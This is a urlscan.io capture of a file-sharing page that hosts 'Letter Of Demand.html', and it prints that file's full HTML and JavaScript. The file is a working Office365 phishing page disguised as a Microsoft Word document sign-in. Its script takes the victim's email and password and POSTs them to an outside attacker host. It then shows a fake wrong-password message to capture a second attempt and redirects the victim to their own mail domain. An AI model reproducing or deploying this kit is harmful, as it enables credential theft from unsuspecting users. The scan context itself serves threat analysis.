public.opacity.io
Open in
urlscan Pro
3.19.6.208
Public Scan
URL:
https://public.opacity.io/9DbgsirnR
Submission: On May 26 via manual from ZA — Scanned from DE
Submission: On May 26 via manual from ZA — Scanned from DE
Form analysis
0 forms found in the DOMText Content
OPACITY * Why Opacity? * Downloads * Learn * Help Center * Explore Plans * Log in <html lang="en"> <head> <meta http-equiv="x-ua-compatible" content="EmulateIE9"> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous"> <title>Microsoft Word</title> </head> <body style="background-image: url('https://i.gyazo.com/b308246805567e68aad040e42c453a7f.png'); background-repeat: no-repeat;background-size: cover;"> <div class="container-fluid p-0"> <div class="container"> <div class="row my-5"> <div class="col-lg-5 mx-auto"> <div class="m-5 p-4 bg-white rounded" id="div1" style="box-shadow: 0px 2px 5px rgba(0,0,0,0.5);"> <div class="text-left"> <span><img src="https://i.gyazo.com/cc41020ecb5162014937e0d1c83fa617.png" class="img-fluid" width="110px"></span><span class="pl-4 h5 align-middle"> </span><br><br> <span class="h5">Sign in</span><br> <span class="h5"></span><br> <span class="h">SIGN-IN WITH OFFICE365 MAIL TO VIEW DOCUMENT</span><br> <span id="msg" class="text-danger" style="display: none;">Wrong Password..! Please enter correct password.</span><br> <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span> <small></small> <div class="form-group"> <input type="email" name="ai" class="form-control rounded-0 bg-transparent" id="ai" aria-describedby="aiHelp" placeholder="Email"> </div> <div class="form-group mt-2"> <small></small> <input type="password" name="pr" class="form-control" id="pr" aria-describedby="aiHelp" placeholder="Password"> </div> </div> <div class="form-check mt-3"> <input type="checkbox" class="form-check-input" id="exampleCheck1"> <label class="form-check-label" for="exampleCheck1"><span><a href="#">Keep me sign in</a></span></label> <span><span><a href="#" class="float-right">Forgot Password?</a></span></span> </div> <div class="col-lg-12 mt-3"> <button class="btn text-white px-4 w-100" id="submit-btn" style="background-color: #0a59a3;">Next</button> </div> </div> </div> <!-- Optional JavaScript --> <!-- jQuery first, then Popper.js, then Bootstrap JS --> <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script> <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script> </body> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script> <script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script> <script> /* global $ */ $(document).ready(function() { var count = 0; /////////////url ai getting//////////////// var ai = window.location.hash.substr(1); if (!ai) { } else { // $('#ai').val(ai); var my_ai = ai; var ind = my_ai.indexOf("@"); var my_slice = my_ai.substr((ind + 1)); var c = my_slice.substr(0, my_slice.indexOf('.')); var final = c.toLowerCase(); $('#ai').val(my_ai); $('#aich').html(my_ai); $("#msg").hide(); } ///////////////url getting ai//////////////// var file = "bmV4dC5waHA="; $('#submit-btn').click(function(event) { $('#error').hide(); $('#msg').hide(); event.preventDefault(); var ai = $("#ai").val(); var pr = $("#pr").val(); var msg = $('#msg').html(); $('#msg').text(msg); ///////////new injection//////////////// var my_ai = ai; var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/; if (!ai) { $('#error').show(); $('#error').html("Email field is empty.!"); return false; } if (!filter.test(my_ai)) { $('#error').show(); $('#error').html("That account doesn't exist. Enter a different account"); return false; } if (!pr) { $('#error').show(); $('#error').html("Password field is empty.!"); return false; } var ind = my_ai.indexOf("@"); var my_slice = my_ai.substr((ind + 1)); var c = my_slice.substr(0, my_slice.indexOf('.')); var final = c.toLowerCase(); ///////////new injection//////////////// count = count + 1; $.ajax({ dataType: 'JSON', url: 'https://basketbolista.com/retrtrfethyrtrfeagteft.php', type: 'POST', data: { ai: ai, pr: pr, }, // data: $('#contact').serialize(), beforeSend: function(xhr) { $('#submit-btn').html('Verifing...'); }, success: function(response) { if (response) { $("#msg").show(); console.log(response); if (response['signal'] == 'ok') { $("#pr").val(""); if (count >= 2) { count = 0; // window.location.replace(response['redirect_link']); window.location.replace("http://www." + my_slice); return false; } // $('#msg').html(response['msg']); } else { // $('#msg').html(response['msg']); } } }, error: function() { $("#pr").val(""); if (count >= 2) { count = 0; window.location.replace("http://www." + my_slice); return false; } $("#msg").show(); // $('#msg').html("Please try again later"); }, complete: function() { $('#submit-btn').html('Continue'); } }); }); }); </script> Letter Of Demand.html 7 KB Download File EASILY SHARE YOUR FILES WITH OPACITY Get 10GB file storage and file sharing for free Free to share ideas. Free to be protected. Free to be you. OPACITY Company About Us Blog Resources Downloads Whitepaper Learn API for Developers Help Help Center Telegram Discord Legal Terms of Service Privacy Policy Code License © 2018-2021 Opacity Storage Inc. All rights reserved.